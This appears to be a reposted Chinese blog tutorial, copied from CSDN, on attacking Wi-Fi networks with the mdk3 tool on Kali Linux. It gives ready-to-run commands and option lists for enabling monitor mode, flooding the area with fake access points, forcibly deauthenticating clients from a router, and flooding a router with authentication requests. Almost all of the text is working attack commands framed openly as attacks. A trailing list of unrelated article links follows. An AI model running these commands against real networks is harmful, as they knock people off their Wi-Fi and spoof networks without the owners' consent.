• 使用Kali MDK3无线攻击


    mdk3 <接口> <测试_模块> [测试选项] 例:mdk3 --wlan0mon b (通过mdk3 使用网卡接口调用b类测试模块发起攻击)
    请注意该mdk3软件在使用时必须打开网卡捕获功能可以打开一个命令窗口输入
    airmon-ng start wlan0 (激活网卡监听功能)

    mdk3 wlan0mon b -f /root/wifi.txt -a -s 1500 (通过MDK3使用网卡接口调用B类测试模块 使用root目录下的wifi.txt文件列表制作一个WPA/2加密的WIFI信号并且传输速率为 1500)
    所有参数
    -f <WIFI名称列表文件的所在位置> 使用此WIFI列表发起信号溢出攻击
    -v <带WIFI名称和MAC地址的对应文件所在位置> 使用此WIFI列表和MAC地址列表发起信号溢出攻击
    -w 加密方式为WEP
    -t 加密方式为WPA/PSK
    -a 加密方式为WPA/2
    -g 54M模式
    -m 读取数据库中的MAC地址列表
    -c <信道数> 设置这些伪造的这些WIFI信号的信道数
    -s <帧数> 设置广播这些伪造WIFI数据包的速度,速度越快用户接受到的列表越多越快,但是对网卡有一定影响

    mdk3 wlan0mon d -b /root/wifi.txt -c 1 -s 1000(通过MDK3使用网卡接口调用D类测试模块 使用root目录下的wifi.txt文件里的MAC地址列表向路由器发出只要黑名单<WIFI.TXT>里的MAC地址全部强制解除认证 该方法只能攻击WIFI信道为1的WIFI信号并且设置发送速度为1000)
    所有参数
    -w <白名单文件的位置> MAC地址白名单里的所有MAC地址都能正常连接WIFI
    -b <黑名单文件的位置> MAC地址黑名单里的所有MAC地址全部解除与路由器的连接
    -s <帧数> 设置广播数据包的速度 ,帧数越大,传播速度越快
    -c <信道数> 设置要攻击的WIFI信道

    mdk3 wlan0mon a -a M2:B6:N4:N2:H7:J0 -m /root/wifi.txt (通过MDK3使用网卡接口调用A类测试模块 使用root目录下的wifi.txt文件来攻击MAC地址为M2:B6:N4:N2:H7:J0的路由器)
    所有参数
    -a 通过文件里的MAC地址去攻击并且检测被攻击路由器是否有文件中的MAC地址
    m 调用数据库中的连接MAC地址
    c 不测试被攻击的路由器里有没有文件里的MAC地址(与-a用法相反)
    i d对指定路由器MAC地址自动攻击(不用自己创建MAC地址列表文件)
    s <帧数> 设置广播数据包的速度 ,帧数越大,传播速度越快

    ————————————————
    版权声明:本文为CSDN博主「我不是猫叔」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
    原文链接:https://blog.csdn.net/JN_Cat/article/details/102302748

  • 相关阅读:
    Oracle 查看一个表对应的主键和外键的约束关系,查看的语句:
    openssl 生成p12文件错误
    XP SP3远程桌面无法连接Windows Server 2008/Vista
    windows 7 正确禁用 IPv6
    用正则表达式替换换行符
    Eclipse插件开发之定制向导(各方法说明)
    oepnvpn 配置自启动
    TNS12547: TNS:lost contact 错误解决
    redhat 5.5 U盘安装
    Hibernat 使用Criteria查询多对多关系(SET集合)条件
  • 原文地址:https://www.cnblogs.com/moegarn/p/11966609.html
Copyright © 2020-2023  润新知